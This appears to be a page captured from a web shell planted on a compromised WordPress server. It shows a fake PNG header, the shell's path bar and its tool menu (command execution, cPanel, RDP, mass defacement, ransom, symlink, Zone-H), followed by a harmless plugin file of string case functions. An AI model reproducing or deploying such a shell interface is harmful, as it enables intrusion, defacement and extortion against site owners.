\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/www.netippbx.net-old/wp-content/plugins/sz-google/functions/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/www.netippbx.net-old/wp-content/plugins/sz-google/functions/SZGoogleFunctions.php |
<?php
/**
* Definition of the PHP functions that can be called directly
* by a theme or a plugin for customizations without use shortcode
*
* @package SZGoogle
* @subpackage Functions
* @author Massimo Della Rovere
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*/
if (!defined('SZ_PLUGIN_GOOGLE') or !SZ_PLUGIN_GOOGLE) die();
/**
* Definition function to convert a string to uppercase also
* configured with different languages. Using if possible mb_()
*/
function SZGOOGLE_UPPER($string)
{
if (!function_exists('mb_strtoupper')) return strtoupper($string);
else return mb_strtoupper($string,'UTF-8');
}
/**
* Definition function to convert a string to lowercase also
* configured with different languages. Using if possible mb_()
*/
function SZGOOGLE_LOWER($string)
{
if (!function_exists('mb_strtolower')) return strtolower($string);
else return mb_strtolower($string,'UTF-8');
}
/**
* Definition function to convert a string to uppercase also
* configured with different languages. Using if possible mb_()
*/
function SZGOOGLE_UWORDS($string)
{
if (!function_exists('mb_convert_case')) return ucwords($string);
else return mb_convert_case($string,MB_CASE_TITLE,'UTF-8');
}